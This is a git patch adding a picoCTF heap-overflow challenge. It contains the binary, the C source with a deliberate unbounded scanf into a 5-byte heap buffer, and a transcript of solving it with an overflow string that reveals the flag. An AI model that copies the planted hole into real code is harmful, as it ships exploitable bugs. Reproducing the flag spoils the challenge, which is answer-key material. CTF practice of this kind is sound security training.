From 955da6e6984b137622ee0ac26a38dbe0d4264837 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 20:43:19 +0200 Subject: [PATCH] pwn/heap_0 --- pwn/heap_0/chall | Bin 0 -> 20664 bytes pwn/heap_0/chall.c | 127 ++++++++++++++++++++++++++++++++++++++++++ pwn/heap_0/output.txt | 34 +++++++++++ 3 files changed, 161 insertions(+) create mode 100755 pwn/heap_0/chall create mode 100644 pwn/heap_0/chall.c create mode 100644 pwn/heap_0/output.txt diff --git a/pwn/heap_0/chall b/pwn/heap_0/chall new file mode 100755 index 0000000000000000000000000000000000000000..952cbfe81a6cfe512ef79ddebd0afecae411bf4f GIT binary patch literal 20664 zcmeHPdw5(`wclrE&SdhMOp>Ne`k;r>(3X-(Qj#`J8#6r z#Ci1L1zLz`b4##(UJ=v_BuS+{Q=i7wjOEaGL}Mh)_M;+C*O-2%TPD)OA}+@Sm3}0W-#OuTPWVZBni_;8 zsf;HzgL0FIXD-#Cqona)#&Z3(3%^{tPS{IIbx_*+dNTNr)YmEed>5GIB|M2FnU!;oX+}3Wdk!6q%*-#>T zc}S21Ta}SzA5nKQ{b0RfnPHPJ_=kz&P@t{1-T%}x*pi;*F)i`KN9|^!9smT zGQkG?kw`269ge1eo=E!RNqxW{jIwlUnF>(Eq_@Kc1J*K0?rTqLF6Q^^9#!9AB zS$OvObvg@|eIcK*EL_$>__-|HNq|W2W#M$b%2eqwxjYa$-(}J~CPz5GFA2rsEZjWb zO+{T6PChaFQtOw`9Ht9LfEp zJ99dXRQ)o^G}SuuJePk$GEK40jB@!Il4)vn<`|bBCz+-~XO3|BA(CkdbmlOZzd+Y9Bs%jc@o@zM)^A>+EW)AFY4d zH_~zvjY?Pimz%M7Lhh3JALI7G!zjQvqV^J5`ChUDp*RjB3PpbUbjkb!WOzbQ*stXF zja091$@{+HbH2xZx5oF_dsd(Fl<(yG$r&i%Gok=T`gEvd{=cce1}?IfH1ZM-5Lwx=PC6$$jVOCovEMv&+LIxv}Y>@&jZh+u=I^IwmDJ2 z!S~bYn?_SLXzS?`$Uey6|3ds~;t#2>#7cJXE{r{UT`RwFGf#BVbBB=KJG9fzv_ zdnse>hgL5fy8*HpuRgLGRtHf{ZYVoU)h4czp+xBqQi*5(f)Ym>p97DkkDZ1H)g7ez zDXD-xOW2``3hKc~O>r@W>Z}=n$Arn3OcQEXM)yUb8v*5w<>ieurtr+tF;a7?h{&}I zZ3zFRfZlM7y^V(AJVBj^ZAiNPJ1^&K$ME|=k3krEPbs;{hRfBVbqj4nqmXSSpSXdJ z>VR#?r<_WkMh~7xGsntcjpEPoCciRfXhT^nHEVfJYC$)in8cf2p)RkS##ajEK0WA=VhQdK=ayY4B zfo)Mz>ov52STGz48^I+74YI2B2mtl9E546!FBs7Ik#T*g6T)d_ahMLRW3s~*&}noEgE6tLpZ<1cJ^Z z&((a0G>t8-$xag`XqK|}=x!|Y2E_=|MM0TkT}9t4&>GySH`D2ZpnKm+r;mXi1RW&# zcj@#GKr7Ft({F+{fzqSs1E6z3$3PoE_nu3quLh+=-w;qzKDvb|dtJ($qCCf8=m@88 zV_YcvLNZvF$Cq9gf^9(dp$$hsnbWo2S-G*KaF62vTQhsrMVBmGKrs1VjXVlFdYLAZ z1}2I80Ls0cK(Eua&e=I+v9vl}UZ=zB?Bu?;LA4P5(S*%4P6x-SzZV0K2;A~vr-SOE zet!&jqreler?#F(J_>x8a9%~F*QpIzZ?RZzaDsKUIvqZ!9MosTX9K-iCI42BI*tVkGx6CY!*|_ga?ppDNL41ue4jT*$a2m&TgdV|J(`nJ zlKOYwPsd0;B0jE@-@5q(BfoL`fzV?qgr}DU#aaeWm4a3XDv5Ao%wr-nJ*0HXBz#Uv zEG-~Ynq?B!BLImX6b+H>mj3daI$1wffp~vV3^&EH3YUGtA1g6jmT|^Zp34h_{!c>A zv|F_2|BJ})%5&>qE{=!wf?g?TNYLGaeq7L71-(zu?+7Z(?f016hP7*(wZ+?dQ_*Bf ztFL!Axa(@_Q(UaSe%Ug2UBeOqGhq~n`0+f4XTd}mkB;?l$Z~Plvo#2%$`n2t3XW%! zLv0r82AerbbdXcFSn2a%R%p44S#7G#qPCG(WVuVRZ3JVr+Z9V5$BHd?SyU@M04d!o zS&7}&2{zC2DYlBuSdI!EY&ENR5E#q96F+J}4Guheq0(h>c?y+nmV{8`u_A}^8>+RK zTidAE>ZJJmYuTHyYfkExrDh2sAkJ@hpUh?D_pK3&NNlJiaE1Vb2&NFyx3L3 znN@Wz7iU&Cxk@?H;&GL6#^ZC9bH>~0n!%aY?XHR^aa>x~^|)p|OU(LyS0%6AH|VP3 zOncHb`y{D0?sd)k1u>frxaPk~%;p@3waAVDSgyLw zwWOGstB<&r@+x*d;JSDQA=eyp)l?9pf7eyV>*^VG)t^sD?-R`S49Y2;X`{$EUjjeZ zdYg5Q>ad=dXR&H_rHsa>{P$2OY{mjdp6$>Q@u#(28%Aw&`>An{*AKZLaRX~rkO7|Be zRLH7|=t)-Ten3LStjb9bu}b$536-$fjm$lJIcuH0f-RWc#8%I7(eta)-OM&q)efbF zbrCa{N_M5du`ATMR6yycN!X&!V-CxuY&$n1ylgMw{l#;s;_`YDb`{U1w$7MILU+E| z=nCHSnfW__&EWhj{#(g^tJru@JZMmm(D4(CuSvQ-K^khX=z~A z>h|(ARn3K~3N5${S{DMiw6G9YW?KnsFUQgER>;Lu`OzwCHJPo!T>~crfjDa#n5ELh z$=CsL!MK?3WBbdm!(FAor2&urb;^>hvS@a^?19f)pO^u`f>`!_QD;7-KcUNE)f@?ssRj}ifhR+ z@QR}R#aT=QMbW40VCJh}85|hhe!R#*WUDgYQlg$`zXd$|8T-{;cfa<@!Zq9e^S8@7 zcU^TWFy-y@&OW=QVn~1TUQ2WD)qlvp1E6KjgLxa~>`T6~`Pq4MFTOkPH%9?lPddK+ zr{?67s_Vs<9x3?dz@NSa(6;dQUtHk-kBazZdCP7*e$V}ne39I{=im9A1*==v9!~xB zm!(I3xf7Sxe9Nf#8sF+vR9C?cHQ%087d)iqyY1E@_rt2|VIX&?iv2@szV#y^b;fbK zb(g~p&^mMV+p24b)KIcts%pXcY7q!G-=VTPLLPoZEqat=W%eDa3p&-FQeAhdPQfa7 zs`z${`@YESN@1s>5sLjql|2K^We>mpuzJA|fp$lWOU%LJE~4z zo3-GM4=QY<_1pWmtHpNfyUcM^Rjps$f1_G-A8Of1V9j>b{!bT0vRj{E$sy5DM;Rw6ZZyxsi^sxjsB~gJ`NJ%}0K%oGX&p`{KM$7^x+Q(P|Ss&>!=25GN{6LvsQdC|xh`?{=x zt`c;Mpgn?KFX#b5za{87L7li3Q>qj6>w=C7+DPx8k;=rg!)<~-C-AheJ1XSY1pS(@ z`>mi^XG3i&5wFGCMkIx3W(&30C#WxP5Ss@3qN&>6a57Pw+&5?>{tiRa1UtNHBaz($ zHTBql2%gV?Yt5N&rdD~5V)Ixy=I*B*WvM`tk0vBuAxDEjBLs$S9yBQQ+(A=eirq!X zw*G%nI+^Vr`=fTt9-Hk^`>0*%v_0zhz5^n&9Rn_8n9;)%6+(9?T>qKvp#7+W8}mCB zzgq!bgj|c`^Rk&hvN5BU*fnsc5)rdjQq z$TX)^a7)fZb|KTewF-GY@r>pV zjLCh)vXqy&J*H6}iJ0^(h`5eSP!u5`+62TD76Z=-F;^Vn_EoIMGtp@k@X5;W0Pe!u z6&Zi&wUyhKFnMun6p9|gEiNYC%Sijs6y@&|<;aWe?ZROQcqztRUX__=MLc1 z&fI=|WeWS_z%|*pEczVqQcD%<_hf-!UnZO)s+l-lRw(@#=TjMuw*w-0^Z-Wb47Z=1 zxtYlJzXP1?dxX8lt?|J>$AyqZ=s9t+aj6FGLVON;vW&srE6SJu7vVyozDU>)=GZS6 z?Uy$pzHSMhRlq6!^5!V}OOKAVLj>ZV*nCKOc*ec9N&YiCkONZ?Lx*3 zOb^ENzDTUsAJK!!SUjQoQ+pXcLKwuy97fPxH@OAvu@3A0c-+4alfPtq9}C6(1DF=2 z1_t)QB}>w2LNmcs-Zgc7{TA=0Hoa~0I+}s4+p*cZseLWHu@7Hw^9ikQ-4>>A=(xPq z+o4~+e*Mxf%Qa*miC1_0Cw+hHcvSJps@SKA)a2<>I{-Tfiq6 zkI%(2b8^1-e1Z`|jTySR*_&nx*n6I%pST%Z4<=%IzdstJjpCRi(j+6Q)0{DT!p}d4 zF{g*-=N1#nGrts-w)}saA4?odm!bbRvY6agCpAjjHx{m$razJV0 z`=qh(e@fx|*kk=^=U4;2#JFP<<>(C8KflaOcLL zF*i<5JPiCkB~{$kB@F7PbN4F#^qRmo@G#rS$I6! zH$jG}c(zJRxFY>y0pWHDM{+ zFYP3~9(r24k+NLBk<=snbK5UqHUfrXD*fg9k))@Dp{zf*|DP59t-`K{DngPp+n-{V z>wgz8iis>gb3YdMWw}lV6P|L%{|i8~{Waky=@HW{^DA%nlHQ-=KPnWG%J#|vq%7&N z9Dg~ll5~Z9m=p!bdS!Xv$?=!-Vo8gop`f|_e?<7p@nf1W6tqp8j{@amEqS6(AXEIL zzkJ@1w2O?gQf~b}fiBzs$OWdcq+O)UN-}N|`Z*Zvv*YIwVey-W#i-(#DTBQyQ10|2t67u_wbMpTp$;tvW5*FAnR>@hiviEAS-~=`a6p%k#AW zk?Ks6`IYrb`d4VO{h3FY3dbHHN+SIvwZl2vzsF-*_6UF3&Rl;f)AJ#fCEG9O+k?Vi zlZJxIdL>*c>KEn`X3~F41~D0GD!~-impJb<8TaWP1?f>sqm|n&d{<56QgnxD&#BZgSPDt|lX-a?F*6u0l zU%JZlp!W;eN!BZA-xT$a34eO;m7S!Y#ONJWE=IbV)uu)6^*h)06I1y6gg<>(oSkw+ zUUyE2xp`-c>GhttU|k5Y3|St(bT6WmkDPOeaopF+3HxbI;kotGJCw=%=Ze66F2^B9 GWd93DK$DUH literal 0 HcmV?d00001 diff --git a/pwn/heap_0/chall.c b/pwn/heap_0/chall.c new file mode 100644 index 0000000..bb97e09 --- /dev/null +++ b/pwn/heap_0/chall.c @@ -0,0 +1,127 @@ +#include +#include +#include + +#define FLAGSIZE_MAX 64 +// amount of memory allocated for input_data +#define INPUT_DATA_SIZE 5 +// amount of memory allocated for safe_var +#define SAFE_VAR_SIZE 5 + +int num_allocs; +char *safe_var; +char *input_data; + +void check_win() { + if (strcmp(safe_var, "bico") != 0) { + printf("\nYOU WIN\n"); + + // Print flag + char buf[FLAGSIZE_MAX]; + FILE *fd = fopen("flag.txt", "r"); + fgets(buf, FLAGSIZE_MAX, fd); + printf("%s\n", buf); + fflush(stdout); + + exit(0); + } else { + printf("Looks like everything is still secure!\n"); + printf("\nNo flage for you :(\n"); + fflush(stdout); + } +} + +void print_menu() { + printf("\n1. Print Heap:\t\t(print the current state of the heap)" + "\n2. Write to buffer:\t(write to your own personal block of data " + "on the heap)" + "\n3. Print safe_var:\t(I'll even let you look at my variable on " + "the heap, " + "I'm confident it can't be modified)" + "\n4. Print Flag:\t\t(Try to print the flag, good luck)" + "\n5. Exit\n\nEnter your choice: "); + fflush(stdout); +} + +void init() { + printf("\nWelcome to heap0!\n"); + printf( + "I put my data on the heap so it should be safe from any tampering.\n"); + printf("Since my data isn't on the stack I'll even let you write whatever " + "info you want to the heap, I already took care of using malloc for " + "you.\n\n"); + fflush(stdout); + input_data = malloc(INPUT_DATA_SIZE); + strncpy(input_data, "pico", INPUT_DATA_SIZE); + safe_var = malloc(SAFE_VAR_SIZE); + strncpy(safe_var, "bico", SAFE_VAR_SIZE); +} + +void write_buffer() { + printf("Data for buffer: "); + fflush(stdout); + scanf("%s", input_data); +} + +void print_heap() { + printf("Heap State:\n"); + printf("+-------------+----------------+\n"); + printf("[*] Address -> Heap Data \n"); + printf("+-------------+----------------+\n"); + printf("[*] %p -> %s\n", input_data, input_data); + printf("+-------------+----------------+\n"); + printf("[*] %p -> %s\n", safe_var, safe_var); + printf("+-------------+----------------+\n"); + fflush(stdout); +} + +int main(void) { + + // Setup + init(); + print_heap(); + + int choice; + + while (1) { + print_menu(); + int rval = scanf("%d", &choice); + if (rval == EOF){ + exit(0); + } + if (rval != 1) { + //printf("Invalid input. Please enter a valid choice.\n"); + //fflush(stdout); + // Clear input buffer + //while (getchar() != '\n'); + //continue; + exit(0); + } + + switch (choice) { + case 1: + // print heap + print_heap(); + break; + case 2: + write_buffer(); + break; + case 3: + // print safe_var + printf("\n\nTake a look at my variable: safe_var = %s\n\n", + safe_var); + fflush(stdout); + break; + case 4: + // Check for win condition + check_win(); + break; + case 5: + // exit + return 0; + default: + printf("Invalid choice\n"); + fflush(stdout); + } + } +} diff --git a/pwn/heap_0/output.txt b/pwn/heap_0/output.txt new file mode 100644 index 0000000..0c90d4f --- /dev/null +++ b/pwn/heap_0/output.txt @@ -0,0 +1,34 @@ +$ nc tethys.picoctf.net 62334 + +Welcome to heap0! +I put my data on the heap so it should be safe from any tampering. +Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you. + +Heap State: ++-------------+----------------+ +[*] Address -> Heap Data ++-------------+----------------+ +[*] 0x5fa8485542b0 -> pico ++-------------+----------------+ +[*] 0x5fa8485542d0 -> bico ++-------------+----------------+ + +1. Print Heap: (print the current state of the heap) +2. Write to buffer: (write to your own personal block of data on the heap) +3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified) +4. Print Flag: (Try to print the flag, good luck) +5. Exit + +Enter your choice: 2 +Data for buffer: picopicopicopicopicopicopicopicopico + +1. Print Heap: (print the current state of the heap) +2. Write to buffer: (write to your own personal block of data on the heap) +3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified) +4. Print Flag: (Try to print the flag, good luck) +5. Exit + +Enter your choice: 4 + +YOU WIN +picoCTF{my_first_heap_overflow_e4c92a78}